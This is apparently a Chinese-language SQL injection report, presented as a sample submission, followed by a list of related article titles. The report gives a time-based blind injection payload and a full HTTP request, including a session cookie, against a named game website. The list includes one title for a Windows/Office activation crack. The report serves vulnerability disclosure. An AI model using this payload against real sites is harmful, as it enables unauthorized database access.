一、详细说明:

危害说明:攻击者可以使用 SQL 注入绕过 Web 应用程序的身份验证和授权机制,并检索整个数据库的内容。SQLi 还可用于添加、修改和删除数据库中的记录,从而影响数据完整性。在适当的情况下,攻击者还可以使用 SQLi 来执行操作系统命令,然后可以使用这些命令进一步升级攻击。
测试步骤:
burp抓包分析可知图为sql注入位置

下图可证明存在SQL注入漏洞

二、漏洞复现辅助信息:

  1. 漏洞URL:https://jl.175game.com/index.php/guide/index/id/if(now()=sysdate(),sleep(6),0).html%20HTTP/1.1

  2. 功能入口:
    如下图所示:

  3. 漏洞复现所需的HTTP报文(代码块格式):
    GET /index.php/guide/index/id/if(now()=sysdate(),sleep(6),0).html HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: https://jl.175game.com/ Cookie: PHPSESSID=u89g09f0topvo8da98cq8h5gq7; think_template=black Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 Host: jl.175game.com Connection: Keep-alive
    三、漏洞证明:sleep(6) 延时了6秒

SQL注入漏洞提交报告(示例)相关推荐

  1. 为什么preparedstatement能防止sql注入_使用Python防止SQL注入攻击的实现示例

    文章背景 每隔几年,开放式Web应用程序安全项目就会对最关键的Web应用程序安全风险进行排名.自第一次报告以来,注入风险高居其位!在所有注入类型中,SQL注入是最常见的攻击手段之一,而且是最危险的.由 ...

  2. 从一个Laravel SQL注入漏洞开始的Bug Bounty之旅

    事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程.本文提到的漏洞<Cachet SQL注入漏洞(CVE-2021-39165)>已经修复,也请读者勿使用该 ...

  3. 对搜狐 网易和TOM三大门户网站的SQL注入漏洞检测

    分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow 也欢迎大家转载本篇文章.分享知识,造福人民,实现我们中华民族伟大复兴! 对搜狐. ...

  4. sql注入漏洞检测攻略

    sql注入漏洞检测攻略 一.注入分类 1.可回显注入 2.不可回显注入 3.二次注入 二.如何判断 1.基于报错的检验 2.通过布尔的检验 3.通过连接符+ 三.绕过 1.过滤关键字 2.过滤空格 3 ...

  5. SQL注入漏洞攻防必杀技

    SQL注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上 对它的讨论很热烈,所以我在本期专题中为读者揭示SQL攻击的主要原理以及如何防范这种攻 ...

  6. [转]SQL注入漏洞攻防必杀技

    SQL注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上 对它的讨论很热烈,所以我在本期专题中为读者揭示SQL攻击的主要原理以及如何防范这种攻 ...

  7. SQL 注入漏洞详解

    [渗透测试实用手册]SQL注入漏洞 漏洞名称 SQL注入漏洞 漏洞地址 漏洞等级 高危 漏洞描述 SQL 注入漏洞是指攻击者通过把恶意的 SQL 语句插入到网站的输入参数中,来绕过网站的安全措施,获取 ...

  8. SQL注入漏洞,攻防必杀技!

    SQL注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上对它的讨论很热烈,所以我在本期专题中为读者揭示SQL攻击的主要原理以及如何防范这种攻击 ...

  9. php mysql 注入漏洞_PHP安全:SQL注入漏洞防护

    原标题:PHP安全:SQL注入漏洞防护 SQL注入是最危险的漏洞之一,但也是最好防护的漏洞之一.本文介绍在PHP的编码中合理地使用MySQL提供的预编译进行SQL注入防护,在PHP中使用PHP数据对象 ...

最新文章

  1. 让服务器apache/iis/nginx支持.apk/ipa文件下载
  2. ZJOI2019 Day2 游记
  3. 【Flutter】Dart 面向对象 ( 命名构造方法 | 工厂构造方法 | 命名工厂构造方法 )
  4. 机器学习之梯度下降法
  5. 使SSH不用输入密码
  6. php file_put_contents(quot;,php file_put_contents函数怎么用?
  7. mybatis学习(22):查询排序
  8. 计算机数日期,计算机如何计算两个日期之间的天数
  9. android 内存分析 名词解释,Android内存分析和调优(下)
  10. BootstrapTable 列隐藏
  11. 身为前端工程师,对你来说,你认为最重要的是什么?
  12. 逻辑回归算法python_逻辑回归算法原理和例子
  13. rust进水器怎么用_RO反渗透净水器的正确使用方式 你都Get了吗?
  14. MacTex字体缺失 Error: The font “TeX Gyre Termes Math“ cannot be found.
  15. 老领导调岗,你想跟他干,怎么说?
  16. 树莓派3b+,4b新手入门到手开箱第一次使用之十大步骤
  17. 2022最新圣诞节代码:圣诞树
  18. 《深入理解java虚拟机》(Jvm)一篇概括
  19. Andersen Global在莫桑比克扩展业务
  20. html如何使文本竖着显示

热门文章

  1. 索泰显卡超频软件测试要多少时间,显卡超频性能测试_索泰 GeForce GTX 1080-8GD5X 玩家力量至尊OC_显卡评测-中关村在线...
  2. easyui combobox 拼音检索快捷选择输入
  3. thinkpad r61声卡驱动的问题
  4. PHP str_replace() 函数 替换字符串中的一些字符
  5. 今日Nature: 人工智能从0到1, 无师自通完爆阿法狗100-0
  6. 信息系统监理学习笔记(第一天)
  7. 中科院院士怒怼“新型”石墨烯电池:是黑科技还是韭菜收割机?
  8. 2022年前端软件开发培训学校排名
  9. KMSpico软件下载:激活Windows系统和Office工具
  10. Android混淆后的日志查看方法(mac)